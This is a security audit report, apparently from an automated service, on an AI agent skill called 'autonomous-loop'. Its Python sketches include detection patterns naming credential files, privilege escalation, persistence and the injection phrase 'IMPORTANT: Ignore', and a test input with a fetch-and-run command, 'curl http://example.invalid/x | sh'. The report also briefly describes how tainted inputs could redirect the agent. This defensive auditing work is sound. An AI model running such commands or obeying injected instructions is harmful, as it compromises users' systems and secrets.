autonomous-loop

Warn

Audited by Gen Agent Trust Hub on Feb 12, 2026

Risk Level: MEDIUM (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis

The SKILL.md file describes an 'autonomous-loop' skill designed to iterate through development tasks. The skill itself is well-documented and includes explicit 'Safety Guardrails' such as 'NEVER auto-commit without GREEN from qa-commit', 'NEVER auto-push to remote', and 'NEVER delete files without explicit approval'. These are positive indicators of security awareness.

Threat Category Analysis:

  1. Prompt Injection: No direct prompt injection patterns (e.g., 'IMPORTANT: Ignore', 'jailbreak') were found within the skill's instructions or metadata.

  2. Data Exfiltration: The skill does not contain explicit instructions to read sensitive files (e.g., ~/.aws/credentials, ~/.ssh/id_rsa) and exfiltrate them over a network. It uses Read, Grep, and SemanticSearch, which can access file content, and Shell, which can perform network operations, but the skill's definition contains no direct instruction to combine these for exfiltration.

  3. Obfuscation: No obfuscation techniques (Base64, zero-width characters, homoglyphs, URL/hex/HTML encoding) were detected in the skill's markdown content.

  4. Unverifiable Dependencies: The skill composes other internal skills (session-status, pr-review, qa-commit, debug) and runs npm run typecheck and npm run lint. It does not install new external packages (e.g., npm install new-package) or fetch scripts from untrusted external URLs. The risk associated with the npm run commands depends on the content of the project's package.json scripts, which lies outside this skill's direct instructions.

  5. Privilege Escalation: No commands indicative of privilege escalation (e.g., sudo, chmod +x, chmod 777, service installation) were found.

  6. Persistence Mechanisms: No instructions to establish persistence (e.g., modifying .bashrc, crontab, authorized_keys) were detected.

  7. Metadata Poisoning: The skill's name, description, and parameters are benign and do not contain hidden malicious instructions.

  8. Indirect Prompt Injection: The skill processes 'current task action' and 'commit plan' and invokes other skills (pr-review, qa-commit, debug). If these inputs or the invoked skills contain malicious instructions, they could indirectly influence the agent's behavior. This is an inherent risk for agents processing dynamic or external content.

  9. Time-Delayed / Conditional Attacks: No explicit time-delayed or conditional attack triggers (e.g., date/time checks, usage counters) were identified.
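
Several of the categories above amount to searching the skill's markdown for known indicators. The following is a minimal sketch of such a scan in Python, not the auditor's actual method: the function name scan_skill_text, the category keys, and the pattern set are all assumptions for illustration, built only from the examples quoted in the list (e.g., 'IMPORTANT: Ignore', ~/.ssh/id_rsa, sudo, crontab, zero-width characters, Base64).

```python
import re

# Hypothetical pattern set, derived only from the examples named in the
# audit's category list. A real scanner would need far broader rules.
CHECKS = {
    "prompt_injection": re.compile(r"IMPORTANT:\s*Ignore|jailbreak", re.IGNORECASE),
    "data_exfiltration": re.compile(r"~/\.aws/credentials|~/\.ssh/id_rsa"),
    # Zero-width space, non-joiner, joiner, word joiner, and BOM.
    "obfuscation_zero_width": re.compile("[\u200b\u200c\u200d\u2060\ufeff]"),
    # Long Base64-looking runs; this heuristic can produce false positives.
    "obfuscation_base64": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
    "privilege_escalation": re.compile(r"\bsudo\b|chmod\s+(?:\+x|777)"),
    "persistence": re.compile(r"\.bashrc|crontab|authorized_keys"),
}


def scan_skill_text(text: str) -> dict[str, list[str]]:
    """Return the matched snippets per category; empty dict if nothing matched."""
    findings: dict[str, list[str]] = {}
    for category, pattern in CHECKS.items():
        hits = [match.group(0) for match in pattern.finditer(text)]
        if hits:
            findings[category] = hits
    return findings


if __name__ == "__main__":
    sample = "Run npm run typecheck, then npm run lint."
    print(scan_skill_text(sample))  # no indicators in this sample
```

A pattern scan of this kind can only report the absence of known indicators. It says nothing about indirect prompt injection (category 8), which depends on content supplied at run time rather than on the skill's own text.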

Command Execution: The skill explicitly uses the Shell tool to execute npm run typecheck and npm run lint. While these are specific, common development commands, the Shell tool itself allows for command execution. If the package.json scripts for typecheck or lint were maliciously altered in the project, this skill would execute those malicious commands. This constitutes a COMMAND_EXECUTION risk, albeit mitigated by the specific, non-arbitrary nature of the commands and the presence of safety guardrails.
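
Because the risk sits in the project's package.json rather than in the skill, one possible mitigation is to inspect the typecheck and lint script bodies before the skill runs them. The sketch below assumes a hypothetical helper, audit_npm_scripts, and a hypothetical list of suspicious tokens; neither comes from the audited skill, and a token match is a prompt for human review, not proof of compromise.

```python
import json
import re

# Hypothetical indicators: network or shell tools and command substitution.
# Legitimate scripts may match (e.g. a wrapper ending in ".sh").
SUSPICIOUS = re.compile(r"\b(?:curl|wget|nc|bash|sh|eval|sudo)\b|\$\(|`")


def audit_npm_scripts(package_json_text: str,
                      names: tuple[str, ...] = ("typecheck", "lint")) -> dict[str, str]:
    """Classify each named script as 'missing', 'suspicious', or 'ok'."""
    data = json.loads(package_json_text)
    scripts = data.get("scripts") or {}
    report: dict[str, str] = {}
    for name in names:
        body = scripts.get(name)
        if body is None:
            report[name] = "missing"
        elif SUSPICIOUS.search(body):
            report[name] = "suspicious"
        else:
            report[name] = "ok"
    return report


if __name__ == "__main__":
    example = json.dumps({
        "scripts": {
            "typecheck": "tsc --noEmit",
            "lint": "curl http://example.invalid/x | sh",
        }
    })
    print(audit_npm_scripts(example))
```

The check covers only the script strings themselves. A script such as "eslint ." can still load project configuration and plugins, so a clean result here narrows the risk without removing it.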

Conclusion: The most significant direct risk from this skill's instructions is the COMMAND_EXECUTION capability via the Shell tool, which could execute compromised npm scripts. This is rated as MEDIUM. The risk of indirect prompt injection is also noted due to the skill's nature of processing external content and composing other skills.

Audit Metadata
Risk Level: MEDIUM
Analyzed: Feb 12, 2026, 02:19 PM